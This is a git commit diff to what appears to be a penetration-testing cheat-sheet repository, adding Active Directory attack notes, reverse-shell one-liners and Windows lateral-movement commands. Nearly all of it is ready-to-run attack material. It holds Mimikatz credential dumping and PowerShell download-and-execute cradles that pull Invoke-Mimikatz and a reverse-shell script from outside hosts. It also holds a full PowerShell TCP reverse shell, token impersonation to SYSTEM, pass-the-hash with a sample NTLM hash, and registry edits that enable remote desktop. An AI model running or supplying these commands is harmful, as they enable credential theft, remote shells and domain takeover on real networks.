SQLmap tips + Active Directory attacks + SQLite injections

2026-03-01 15:03:12 -08:00 · 2018-03-12 09:17:31 +01:00
parent 70f38d5678
commit 30019235f8
13 changed files with 492 additions and 25 deletions
--- a/Resources/Active
+++ b/Resources/Active
@@ -0,0 +1,88 @@
+# Active Directory Attacks
+
+## Most common paths to AD compromise
+  * MS14-068
+  * MS17-010 (Eternal Blue - Local Admin)
+    ```c
+    nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
+    ```
+  * Unconstrained Delegation (incl. pass-the-ticket)
+  * OverPass-the-Hash (Making the most of NTLM password hashes)
+  * Pivoting with Local Admin & Passwords in SYSVOL
+  * Dangerous Built-in Groups Usage
+  * Dumping AD Domain Credentials
+  * Golden Tickets
+  * Kerberoast
+  * Silver Tickets
+  * Trust Tickets
+
+
+## Tools
+  * [Impacket](https://github.com/CoreSecurity/impacket)
+  * Responder
+  * Mimikatz
+  * [Ranger](https://github.com/funkandwagnalls/ranger)
+  * BloodHound
+  * RottenPotato
+
+## Mimikatz
+```
+load mimikatz
+mimikatz_command -f sekurlsa::logonPasswords full
+```
+
+## PowerSploit
+```
+https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
+powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
+powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
+```
+
+
+## PrivEsc - Token Impersonation (RottenPotato)
+Binary available at : https://github.com/foxglovesec/RottenPotato      
+Binary available at : https://github.com/breenmachine/RottenPotatoNG   
+```c
+getuid
+getprivs
+use incognito
+list\_tokens -u
+cd c:\temp\
+execute -Hc -f ./rot.exe
+impersonate\_token "NT AUTHORITY\SYSTEM"
+```
+
+```
+Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
+Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
+Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
+```
+
+## PrivEsc - MS14-068
+```
+Exploit Python : https://www.exploit-db.com/exploits/35474/
+
+Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
+```
+
+## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
+```
+Powershell:
+https://www.exploit-db.com/exploits/39719/
+https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
+
+Binary exe : https://github.com/Meatballs1/ms16-032
+
+Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
+```
+
+## Kerberoast
+```
+https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
+https://room362.com/post/2016/kerberoast-pt1/
+```
+
+## Thanks to
+ * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
+ * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
+ * [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
--- a/Resources/Reverse
+++ b/Resources/Reverse
@@ -72,6 +72,10 @@ Powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```

+```powershell
+powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
+```
+
 Java
 ```java
 r = Runtime.getRuntime()
@@ -109,6 +113,14 @@ ruby: exec "/bin/sh"
 lua: os.execute('/bin/sh')
 ```

+Access shortcuts, su, nano and autocomplete in a partially tty shell
+```
+ctrl+z
+stty raw -echo
+fg
+```
+/!\ OhMyZSH might break this trick
+
 (From within vi)
 ```
 :!bash
@@ -124,3 +136,4 @@ lua: os.execute('/bin/sh')
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 * [Spawning a TTY Shell](http://netsec.ws/?p=337)
+* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -12,6 +12,7 @@ creds
 ```

 ## Metasploit - Psexec
+Note: the password can be replaced by a hash to execute a `pass the hash` attack.
 ```c
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
@@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
 python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
 ```

+## Crackmapexec (Pass The Hash)
+```
+cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
+```
+
 ## Winexe (Integrated to Kali)
 ```python
 winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
@@ -51,6 +57,10 @@ Note: you may need to enable it with the following command
 ```
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
 ```
+or with psexec(sysinternals)
+```
+psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+```

 ## Netuse (Windows)
 ```
@@ -69,6 +79,8 @@ PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
 PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
 ```

+
 ## Thanks
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+ - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+ - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)